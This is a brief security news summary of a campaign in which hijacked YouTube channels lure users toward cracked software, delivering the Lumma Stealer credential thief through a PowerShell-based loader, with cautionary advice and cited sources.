Threat actors have been utilizing YouTube channels to distribute the Lumma Stealer malware [1]. This method is similar to a previous attack that used AI to spread tutorials on installing cracked software without a license [1]. By leveraging open source platforms like GitHub and MediaFire [1], these attackers are able to elude web filters and distribute the malware. The YouTube videos feature content related to cracked applications and include malicious URLs in the descriptions [1].
Description
When users click on these links, they are directed to a direct download of a new NET loader that fetches the final malware [1], Lumma Stealer [1] [2]. This variant of the malware is specifically designed to target sensitive information such as user credentials and browser data. The attack begins with hackers breaching YouTube accounts and uploading videos with malicious URLs [1]. These videos entice users to download a ZIP file that contains the malware [1]. Within the ZIP file, there is an LNK file that calls PowerShell to download a NET execution file from GitHub repositories [1]. To avoid detection, the malware incorporates various techniques to evade security measures.
Once launched, the malware establishes communication with a command-and-control server and sends stolen data back to the attackers [1]. The campaign has updated its exfiltration method to leverage HTTPS for better evasion [1]. In light of these developments, Fortinet advises caution when downloading applications from YouTube or other platforms [1]. It is also recommended to provide basic cybersecurity training to employees in order to prevent the download of malicious files in corporate environments.
Conclusion
This method of using YouTube channels to distribute malware poses a significant threat to users’ sensitive information. It is crucial for individuals to exercise caution when downloading applications from YouTube or other platforms [1]. Additionally, providing basic cybersecurity training to employees can help prevent the download of malicious files in corporate environments. As threat actors continue to evolve their techniques, it is important for individuals and organizations to stay vigilant and implement necessary security measures to protect against such attacks.
References
[1] https://www.darkreading.com/cyberattacks-data-breaches/weaponized-youtube-channels-spread-lumma-stealer
[2] https://thehackernews.com/2024/01/beware-youtube-videos-promoting-cracked.html
